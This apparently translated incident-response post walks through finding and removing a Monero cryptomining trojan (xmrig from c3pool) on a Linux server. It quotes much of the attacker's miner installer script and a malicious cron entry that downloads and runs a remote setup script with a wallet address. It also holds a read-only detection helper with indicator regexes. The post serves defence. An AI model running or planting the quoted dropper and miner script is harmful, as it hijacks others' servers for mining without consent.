Recently a cryptomining trojan was found planted on one of the company's servers, so I started the investigation.
1. Run "top -c" to check system load and find the PIDs of the processes consuming the most CPU (some mining trojans replace the top binary to hide their process; run "which top | xargs stat" and check the timestamps and size to judge whether the top binary has been tampered with);
3. With the PID obtained, run "ps -ef -p PID" to get the full details of the process;
4. From the process details, locate the file on disk and analyze it to confirm whether it is a mining trojan;
5. If it is confirmed to be a mining trojan, clean up as follows:
(1) Kill the mining-related processes: kill -9 PID;
(2) Delete the mining-related files: rm -rf <abnormal file>; before deleting, run "find / -name <abnormal file>" to locate every copy of the malicious file on the system;
List the .sh files modified in the last 3 days:
find /home/ -type f -mtime -3 -name '*.sh'
(-mtime -3 selects files modified within the last 3 days; -mtime +3 would select files older than 3 days. The pattern is quoted so the shell does not expand it against the current directory.)
Several suspicious .sh files turned up; part of their contents is excerpted below:
#!/bin/bash
HOME=/tmp
#!/bin/bash
VERSION=2.11
# printing greetings
if [ "$(id -u)" == "0" ]; then
echo "WARNING: Generally it is not adviced to run this script under root"
echo "警告: 不建议在root用户下使用此脚本"
fi
# command line arguments
WALLET=$1
EMAIL=$2 # this one is optional
# checking prerequisites
if [ ! -d $HOME ]; then
echo "ERROR: Please make sure HOME directory $HOME exists or set it yourself using this command:"
echo ' export HOME=<dir>'
exit 1
fi
# printing intentions
echo "I will download, setup and run in background Monero CPU miner."
echo "将进行下载设置,并在后台中运行xmrig矿工."
echo "If needed, miner in foreground can be started by $HOME/c3pool/miner.sh script."
echo "如果需要,可以通过以下方法启动前台矿工输出 $HOME/c3pool/miner.sh script."
echo "Mining will happen to $WALLET wallet."
echo "将使用 $WALLET 地址进行开采"
if [ ! -z $EMAIL ]; then
echo "(and $EMAIL email as password to modify wallet options later at https://c3pool.com site)"
fi
echo
echo
echo "JFYI: This host has $CPU_THREADS CPU threads with $CPU_MHZ MHz and ${TOTAL_CACHE}KB data cache in total, so projected Monero hashrate is around $EXP_MONERO_HASHRATE H/s."
echo
echo "Sleeping for 15 seconds before continuing (press Ctrl+C to cancel)"
echo "等待 15 秒将继续运行安装 (按 Ctrl+C 取消)"
sleep 15
echo
echo
# start doing stuff: preparing miner
echo "[*] Removing previous c3pool miner (if any)"
echo "[*] 卸载以前的 C3Pool 矿工 (如果存在)"
if sudo -n true 2>/dev/null; then
sudo systemctl stop c3pool_miner.service
fi
killall -9 xmrig
echo "[*] Removing $HOME/c3pool directory"
rm -rf $HOME/c3pool
echo "[*] Downloading C3Pool advanced version of xmrig to /tmp/xmrig.tar.gz"
echo "[*] 下载 C3Pool 版本的 Xmrig 到 /tmp/xmrig.tar.gz 中"
if ! curl -L --progress-bar "http://download.c3pool.org/xmrig_setup/raw/master/xmrig.tar.gz" -o /tmp/xmrig.tar.gz; then
echo "ERROR: Can't download http://download.c3pool.org/xmrig_setup/raw/master/xmrig.tar.gz file to /tmp/xmrig.tar.gz"
echo "发生错误: 无法下载 http://download.c3pool.org/xmrig_setup/raw/master/xmrig.tar.gz 文件到 /tmp/xmrig.tar.gz"
exit 1
fi
# preparing script
echo "[*] Creating $HOME/c3pool/miner.sh script"
echo "[*] 在该目录下创建 $HOME/c3pool/miner.sh 脚本"
cat >$HOME/c3pool/miner.sh <<EOL
#!/bin/bash
if ! pidof xmrig >/dev/null; then
nice $HOME/c3pool/xmrig \$*
else
echo "Monero miner is already running in the background. Refusing to run another one."
echo "Run \"killall xmrig\" or \"sudo killall xmrig\" if you want to remove background miner first."
echo "门罗币矿工已经在后台运行。 拒绝运行另一个."
echo "如果要先删除后台矿工,请运行 \"killall xmrig\" 或 \"sudo killall xmrig\"."
fi
EOL
chmod +x $HOME/c3pool/miner.sh
# preparing script background work and work under reboot
echo ""
echo "NOTE: If you are using shared VPS it is recommended to avoid 100% CPU usage produced by the miner or you will be banned"
echo "提示: 如果您使用共享VPS,建议避免由矿工产生100%的CPU使用率,否则可能将被禁止使用"
echo "[*] Setup complete"
echo "[*] 安装完成"
(3) Check and clean up abnormal cron jobs:
crontab -l (current user; use "crontab -e" to edit and remove entries)
crontab -u username -l
cat /etc/crontab
cat /etc/anacrontab
cat /etc/cron.d/*
ls -l /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/ /etc/cron.monthly/
ls -l /var/spool/cron/
cat /var/spool/cron/*
(On Debian/Ubuntu the per-user crontabs live in /var/spool/cron/crontabs/ instead.)
While reviewing the cron files under /var/spool/cron, a cron entry file created by the www user was found with the following content:
/bin/sh -c cd /tmp/ && curl -O http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh && echo '#!/bin/bash' > t.sh && echo 'HOME=/tmp' >> t.sh && cat t.sh setup_c3pool_miner.sh > c.sh && chmod +x c.sh && ./c.sh 8BsALiDG227KVf6o684JjxNua2tiEaWpuwZb8zUJCrJTpJ4TA9KGXSgSiYucv5PaKx31MRsY7jb8vRjhvWM8
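A read-only triage helper for the cron review above and for tying a high-CPU PID back to its file on disk (step 3), added here as an example; it is not part of the original post. The indicator regex, the function names and the sample crontab entries (wallet replaced by a placeholder) are my own construction, built from the xmrig/c3pool strings seen in this incident.

```shell
#!/bin/sh
# Read-only triage helper: it reports, it does not kill or delete anything.

# Indicators taken from the cron job and script in this post (xmrig, c3pool,
# the setup_c3pool_miner.sh dropper) plus generic "download, then execute"
# shapes. Extended regex for grep -E.
MINER_PATTERN='xmrig|c3pool|setup_c3pool_miner|(curl|wget)[^|;]*\|[[:space:]]*(ba)?sh|chmod[[:space:]]+\+x[^&;]*&&[[:space:]]*\./'

# Count indicator hits in every regular file under a cron directory
# (/var/spool/cron, /var/spool/cron/crontabs, /etc/cron.d ...).
count_cron_hits() {
    _total=0
    for _f in "$1"/*; do
        [ -f "$_f" ] || continue
        _n=$(grep -cE "$MINER_PATTERN" "$_f") || true   # grep exits 1 on zero matches
        _total=$((_total + ${_n:-0}))
    done
    echo "$_total"
}

# Print matching lines with file name and line number, so the owning user's
# entry can then be removed with "crontab -u <user> -e".
show_cron_hits() {
    grep -rnE "$MINER_PATTERN" "$1" 2>/dev/null || echo "no indicator hits in $1"
}

# Live-system view for steps 3 and 4: top CPU consumers with the real
# executable path from /proc. A "(deleted)" suffix means the binary was
# removed from disk after the process started; "?" means unreadable.
top_cpu_with_exe() {
    ps -eo pid=,pcpu=,comm= --sort=-pcpu | head -n "${1:-5}" | while read -r pid cpu comm; do
        printf '%s %s%% %s -> %s\n' "$pid" "$cpu" "$comm" "$(readlink "/proc/$pid/exe" 2>/dev/null || echo '?')"
    done
}

# Constructed sample: two per-user crontab files, one benign and one shaped
# like the www user's entry found in this incident (wallet replaced).
demo_dir=$(mktemp -d)
printf '0 3 * * * /usr/bin/certbot renew --quiet\n' > "$demo_dir/root"
printf '* * * * * /bin/sh -c "cd /tmp/ && curl -O http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh && chmod +x c.sh && ./c.sh WALLET_PLACEHOLDER"\n' > "$demo_dir/www"

show_cron_hits "$demo_dir"
```

On a live host, run show_cron_hits against /var/spool/cron (or /var/spool/cron/crontabs) and /etc/cron.d, and top_cpu_with_exe to see which binary each busy PID actually runs.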
(4) Check the SSH key authentication files
Delete the key files the trojan created. If key authentication was never configured on this system, the directory can simply be emptied: rm -rf /root/.ssh/*. If key authentication was configured, delete only the entries the attacker added. Check the authorized_keys file of every account, not just root; the service account that owned the cron job above is a natural place to look.